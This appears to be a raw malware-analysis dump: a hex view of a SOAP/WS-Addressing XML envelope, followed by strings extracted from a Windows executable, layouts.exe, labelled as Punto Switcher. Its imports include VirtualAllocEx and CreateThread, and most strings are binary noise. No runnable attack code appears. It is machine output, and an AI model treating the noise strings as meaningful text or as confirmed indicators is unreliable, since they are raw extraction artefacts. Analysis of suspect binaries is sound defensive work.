0x00000270 (00624)   3a623666 39306463 392d3037 37612d34   :b6f90dc9-077a-4
0x00000280 (00640)   6366352d 39376432 2d366365 63666233   cf5-97d2-6cecfb3
0x00000290 (00656)   38376164 643c2f77 73613a4d 65737361   87add</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3336 66333264   >urn:uuid:36f32d
0x00000340 (00832)   63312d66 3936352d 34333635 2d613530   c1-f965-4365-a50
0x00000350 (00848)   312d3231 61363237 32313264 66323c2f   1-21a627212df2</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>


Strings
dsilc.
.
gM
.
.hpoa|.......
....
....
.....
[.
...
.
r-a..y@G..7
t
.
 
..

041904B0
3, 2, 7, 84
56498489498489
Choose Layouts
Comments
CompanyName
Copyright 2008-2011 
FileDescription
FileVersion
hGhICjYfrR
InternalName
layouts.exe
LegalCopyright
LegalTrademarks
MS Shell Dlg
OriginalFilename
PNUUHIGoqP
ProductName
ProductVersion
 Punto Switcher
 Punto Switcher 
Punto Switcher
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
/0$Jtcx
0Th2b p9}grj{ c
#%0Y'W0
12).2h)p2
'1{B>W
;|2	<8#=<d#q< #
30*X3F*
3}!43Q"
3>#j5c$
,!-4.?
4]pKcec:keo]#x-Tks-5brmnirl6e_ogyd
5BK5#7
$5-N&y[
]6b;^"4
6be+aun+xn 
6^p;zfcjcfo
 :7cpK
7[o^aiq
7XNr[,
8;_L8Fq
/<9r,n9(,
_>9zmeKY
a:1*=%W
ADVAPI32.dll
.{aL/ga2
Aq!-5#
</assembly>
      <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
b>2V}sE
;b/>;8.
b>hJ3e
B,QR~(
BringWindowToTop
#bsJG"
bvFVywPWtN
C0('W09
*,C\?6
c7+1/a
ChooseFontW
CloseHandle
CloseMetaFile
#$<C,M=
CoInitializeSecurity
COMCTL32.dll
COMDLG32.dll
CommDlgExtendedError
CoUninitialize
CreateCompatibleDC
CreateFileW
CreatePropertySheetPageW
CreateSolidBrush
CreateThread
C`vatOUilWR
<_[C,Z
D]%9q\!
@.data
DeleteCriticalSection
DeleteDC
DeleteObject
]del<r
  </dependency>
  <dependency>
    </dependentAssembly>
    <dependentAssembly>
dt-'lpe
E1JG=Z
eHS}dlOR
EnterCriticalSection
eVwC|D`R
$E>,%y>
fcjcfo
FindResourceW
FjXp`8
FreeLibrary
"gaVRl
GDI32.dll
GetCommandLineA
GetCommandLineW
GetCurrentThreadId
GetLastError
GetModuleHandleA
GetModuleHandleW
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetUserDefaultLangID
GF5t I
G-=L.t
gpT9@)
g|	qc|
GT9jU@
(H3NqAb
HeapAlloc
HeapDestroy
HeapFree
H~kn6rqi,}7 
hW&:qjZ
ih[:6E[pk
i+hyFE
iK|?jJ|
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IsWindow
IsWindowVisible
.$:J1V:
/j)a	m
J:=bZ\
 ^+!jK
<J[.l3*?
Jz82Gd
!k58!gy
K$|9<)
KERNEL32.dll
K/J5:i
K._}K._}+
~knfqqi
kRi`eS
[`< KS
Ky}jcv
L!.4>?
L$-4NG
LeaveCriticalSection
LoadIconA
LoadIconW
LoadLibraryA
LoadLibraryW
LoadResource
lstrlenA
lstrlenW
,+=l,v=
M|D)av
MessageBoxW
MsgWaitForMultipleObjects
MultiByteToWideChar
MYw3dC`B
n1ApVm
NKD(mEBI
nRkD61K0/
o;Gy8Z
ojuw1\{79eac9d1-baf9-11ce-8c82-00aa004ba90b}
ole32.dll
Om@7~v
}om>dol
P)41|%
PE-R@T
p<GiWY
PrintDlgW
`P(uS3
Pz"{UL
@_$Q3Jp
"Q3p s3
#;q;4+X
q<G):Y
>&QQ>]j
QYf|%[
`.rdata
RegOpenKeyA
RegQueryValueExA
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
      <requestedPrivileges>
=rgy+ 5
rrywkA
%S1g b1
$S56$n5
s]7xol"g8T%
S$|9D)
SaveDC
    </security>
    <security>
SetEvent
SetForegroundWindow
SetLastError
ShowWindow
SizeofResource
*Stkz^
T2~r(Ko
tbp~OiiEs
!This program cannot be run in DOS mode.
t~>(J	=:
TranslateMessage
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
.Tt;~]
t]V/SQ
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))U
>u-8?J.I?
U$hliG-
(UJYZnp#G
	u=?:,o
UoZAD0L
USER32.dll
ut~0v/
"U$)TKD
uvtP@|cAVwreA`
>!uw@`
VirtualAllocEx
vti\b: 
WaitForSingleObject
"wI>9s
WideCharToMultiByte
WKL7=?
X(|9F-
+X[A"1
xap.Tli
X+b<27
X]M:1Jnl
XY	R3n
Y\0*$! 
<YMsNX
;y@n_@
[Ynj\A
Yr]@*8
*Zt;G)